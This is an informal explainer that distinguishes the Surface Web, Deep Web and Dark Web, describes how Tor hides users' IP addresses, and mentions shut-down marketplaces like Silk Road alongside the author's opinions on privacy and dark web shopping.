When talking about the Dark Web, one of the concepts most often confused with it is the Deep Web. But first, the Surface Web: it is the indexable part of the internet, all the websites you can find through search engines such as Google, Yahoo and Bing. The Deep Web is everything else, everything on the internet that is not indexed. Much of it sits behind login credentials: social media posts, personal data such as credit card or medical records, company databases and more make up the Deep Web.


The Dark Web is the part of the internet that is not indexable and can only be reached with specific software such as Tor (The Onion Router). Tor is a distributed network in which traffic is relayed through several routers so that no single relay sees both the source and the destination (https://www.torproject.org/).
The poster below shows these concepts of the internet (https://coar.risc.anl.gov/wp-content/uploads/2016/05/DarkNet_Poster_R8-622×1024.png)

Privacy
Privacy is one of the most important concerns for people today, with the rise of the internet and personal cloud usage. People want to feel safe and unmonitored. Websites and applications collect tracking data on their users and use it for targeted, and even location-based, advertising; our internet usage has become a way for vendors to collect information about us. Using the Dark Web through Tor hides a user’s network identity (IP address and location) from the sites they visit, so that layer of tracking is lost. It does not make everything anonymous, though: a site can still recognise a user who logs in, accepts cookies or has a distinctive browser fingerprint, which is why Tor Browser tries to make every user look the same.
Criminals
Because of its anonymity and privacy, most people think that using the Dark Web is illegal, since criminals use it to protect themselves. Criminals run online markets for selling their illegal goods, but law enforcement agencies such as the police also use the Dark Web to catch these criminals.
Last Words
One of the most popular marketplaces was Silk Road. It started out selling magic mushrooms and then grew to cover other drugs too. Another popular marketplace was Wall Street Market, which offered drugs, jewellery, malware, fraud kits, stolen data and more. Both have since been shut down by law enforcement.
Dark Web markets are not only about buying or selling illegal goods. They can offer better prices for legal services, electronics, groceries and so on as well, since there is nobody between the seller and the buyer and no taxes or advertising. I also think most people prefer to shop without receiving offers based on their previous purchases, since the market collects no information about them.
People, mostly those far from these technologies, think the Dark Web is a place that needs a lot of technical knowledge. In fact there is little difference between the Surface Web and the Dark Web: only the software used to reach it, and the anonymity and privacy, are different. Users do, however, need to be familiar with cryptocurrency to shop on the Dark Web.